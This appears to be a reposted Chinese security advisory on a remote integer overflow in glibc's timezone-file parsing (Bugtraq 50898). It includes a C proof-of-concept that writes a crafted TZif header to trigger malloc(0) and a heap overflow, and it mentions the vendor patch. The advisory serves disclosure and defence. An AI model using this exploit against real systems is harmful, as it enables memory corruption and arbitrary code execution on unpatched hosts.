发布日期:2009-06-01
更新日期:2012-02-14受影响系统:
GNU glibc
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50898glibc是绝大多数Linux操作系统中C库的实现。GNU glibc在实现上存在远程整数溢出漏洞,攻击者可利用此漏洞以当前用户权限执行任意代码。<*来源:dividead
链接:https://bugzilla.redhat.com/show_bug.cgi?id=761245
*>测试方法:
--------------------------------------------------------------------------------
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!dividead ()提供了如下测试方法:#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>#define TZ_MAGIC "TZif"#define PUT_32BIT_MSB(cp, value)
do {
(cp)[0] = (value) >> 24;
(cp)[1] = (value) >> 16;
(cp)[2] = (value) >> 8;
(cp)[3] = (value);
} while (0)struct tzhead {
char tzh_magic[4];
char tzh_version[1];
char tzh_reserved[15];
char tzh_ttisgmtcnt[4];
char tzh_ttisstdcnt[4];
char tzh_leapcnt[4];
char tzh_timecnt[4];
char tzh_typecnt[4];
char tzh_charcnt[4];
};struct ttinfo
{
long int offset;
unsigned char isdst;
unsigned char idx;
unsigned char isstd;
unsigned char isgmt;
};
int main(void)
{
struct tzhead evil;
int i;
char *p;
42
uint32_t total_size;
uint32_t evil1, evil2; /* Initialize static part of the header */
memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
evil.tzh_version[0] = 0;
memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt)); /* Initialize nasty part of the header */
evil1 = 500;
PUT_32BIT_MSB(evil.tzh_timecnt, evil1); total_size = evil1 * (sizeof(time_t) + 1);
total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
& ~(__alignof__ (struct ttinfo) - 1)); /* value of chars, to get a malloc(0) */
evil2 = 0 - total_size;
PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
p = (char *)&evil;
for (i = 0; i < sizeof(evil); i++)
printf("%c", p[i]); /* data we overflow with */
for (i = 0; i < 50000; i++)
printf("A");
}建议:
--------------------------------------------------------------------------------
厂商补丁:GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.gnu.orgPHP “tidy_diagnose()”空指针引用拒绝服务漏洞Skype聊天日志本地信息泄露漏洞相关资讯 GNU
- GNU、开源和 Apple 的那些黑历史 (07/27/2015 08:43:29)
- Linux环境下GNU, GCC, G++编译器 (07/17/2014 11:08:38)
- GNU: 走向后稀缺世界 (01/26/2014 19:03:30)
| - GNU宣言发表三十周年 (03/18/2015 17:29:27)
- GNU C库“posix_spawn_file_ (06/16/2014 19:58:14)
- GNU虚拟私人专线 (11/30/2013 08:48:00)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站